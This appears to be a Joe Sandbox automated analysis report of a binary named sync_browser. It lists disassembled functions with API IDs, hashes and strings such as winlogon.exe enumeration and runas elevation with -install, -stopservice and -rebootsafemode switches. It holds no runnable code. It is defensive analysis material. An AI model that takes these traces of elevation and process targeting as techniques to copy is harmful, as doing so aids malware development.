                                                                    Function 00007FF6DC17EEF8 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __doserrno_close_nolock_errno
                                                                    • String ID:
                                                                    • API String ID: 186997739-0
                                                                    • Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                    • Instruction ID: e4cae65a9f308273dcc3df24c2ec45d91e8694c3f583e4262015c2465dba32cc
                                                                    • Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                    • Instruction Fuzzy Hash: E4110F22E0C2AACAF2016F24EC4137D2698BF817A0F594577F51DC76C2CE3CA862D310
                                                                    Function 00007FF6DC0CA040 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCurrentInputMessageOpen
                                                                    • String ID:
                                                                    • API String ID: 1973726940-0
                                                                    • Opcode ID: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                    • Instruction ID: 180ed23018d4fd56df024a7a3b09c238cdfa48ec3bb4504805b5305e098cc67a
                                                                    • Opcode Fuzzy Hash: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                    • Instruction Fuzzy Hash: 2611AF25B1DB6982EB149B62B84452DA2A0BB4DFD0F18043AEE5EC3B54CF3DD463C700
                                                                    Function 00007FF6DC0C3E60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56timewindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Timer$KillMessageModePostQuitWindow
                                                                    • String ID: d
                                                                    • API String ID: 3664928928-2564639436
                                                                    • Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                    • Instruction ID: 02d4bf63411bdafd521233f563cb1a4b9d51a1d712d652c585bc6e1933a0af34
                                                                    • Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                    • Instruction Fuzzy Hash: 2311C1A2E2861B83F7608B34A9047BD2294AF44361F444231CA2EC56E0DF3D98A3CA11
                                                                    Function 00007FF6DC0DA6F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$Long$DialogForegroundItemText
                                                                    • String ID: Oct 1 2014 21:43:49
                                                                    • API String ID: 2747855613-2751236551
                                                                    • Opcode ID: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                                    • Instruction ID: 3fcf02a75d399f36dba0a3f9a297d7e351fc1f2555dbe70194e2555046b9e249
                                                                    • Opcode Fuzzy Hash: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                                    • Instruction Fuzzy Hash: E3119331A08B5A81E3108B26A94423E6365FB89BD0F144132EA9E43B94CF7DD563C700
                                                                    Function 00007FF6DC0D7FB0 Relevance: 10.5, APIs: 7, Instructions: 46synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$ObjectResetSingleWait$CriticalEnterSection
                                                                    • String ID:
                                                                    • API String ID: 3343876880-0
                                                                    • Opcode ID: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                    • Instruction ID: 742c4641ac6ecbf3ed14e0bf9aaff46ddd26fd248d8963cffef0589061a7221b
                                                                    • Opcode Fuzzy Hash: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                    • Instruction Fuzzy Hash: 4F215471A08B55D3EB589B22D9883AC6724FB84B91F044132DB1E87A50CF3CE5B7C740
                                                                    Function 00007FF6DC0D19A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                    • String ID: winlogon.exe
                                                                    • API String ID: 1789362936-961692650
                                                                    • Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                    • Instruction ID: 206741a130359d52203320242b5feade03ac2f31a4e95038ee59c0e3d8f80f21
                                                                    • Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                    • Instruction Fuzzy Hash: 40111231708A5A91EB249F25FC543AE63A4FFC87A5F444232D56E86694DF3CE127CA40
                                                                    Function 00007FF6DC0D3620 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -rebootforce$p$runas
                                                                    • API String ID: 3648085421-45594291
                                                                    • Opcode ID: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                    • Instruction ID: c7e0f96b009e7e88dfc34109de17af70056daacc9509d897528194607de7fc7d
                                                                    • Opcode Fuzzy Hash: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                    • Instruction Fuzzy Hash: 2401CC35619B9585E7219F50F89439FB3A8FB89344F80023AD6DD82B64DF7CD16ACB40
                                                                    Function 00007FF6DC0D36C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -rebootsafemode$p$runas
                                                                    • API String ID: 3648085421-4291177908
                                                                    • Opcode ID: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                                    • Instruction ID: 6dc4ccc1148b84e15650a9a8a44d8dcc041bf510177d10570ba77f0d25ceebe1
                                                                    • Opcode Fuzzy Hash: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                                    • Instruction Fuzzy Hash: 3701CC35619B9585E7219F50F89439FB3A8FB89344F80023AD6DD82B64DF7CD16ACB40
                                                                    Function 00007FF6DC0C9910 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -stopservice$p$runas
                                                                    • API String ID: 3648085421-4230321595
                                                                    • Opcode ID: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                    • Instruction ID: 96250919f7bde948a6ddcc9de428c836447f45214d7458710f804fb1258d3805
                                                                    • Opcode Fuzzy Hash: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                    • Instruction Fuzzy Hash: 8901C835618B95C5E7609B10F89439EB3A8FB89748F800236D6DD42B64DF7DD12ACB40
                                                                    Function 00007FF6DC0C99C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -startservice$p$runas
                                                                    • API String ID: 3648085421-278061118
                                                                    • Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                    • Instruction ID: 828a6b82688046e691682f582e10537b00f530d497b8e08ef0eba773391a5381
                                                                    • Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                    • Instruction Fuzzy Hash: 2A01DA3561CB95C5E7619B10F89439EB3A8FB89748F800236D6DD42B64DF7DD12ACB40
                                                                    Function 00007FF6DC0C9A70 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -install$p$runas
                                                                    • API String ID: 3648085421-1683557327
                                                                    • Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                    • Instruction ID: 26d9b7c3cd74f40dcee238c5f7445cee2acde2a189669813f7a5407bd89041c6
                                                                    • Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                    • Instruction Fuzzy Hash: FE01DA3561CB95C5E7609B10F89439EB3A8FB89748F800236D6DD42B64DF7DD12ACB40
                                                                    Function 00007FF6DC0C9B20 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -uninstall$p$runas
                                                                    • API String ID: 3648085421-3602422011
                                                                    • Opcode ID: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                                    • Instruction ID: 620219c9053c9a245aaa10a9f2cc2eb318d0a6f51123dc745b277874db71c180
                                                                    • Opcode Fuzzy Hash: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                                    • Instruction Fuzzy Hash: AC01DA3561CB95C5E7609B10F89439EB3A8FB89748F800236D6DD42B64DF7DD12ACB40
                                                                    Function 00007FF6DC0FBA00 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
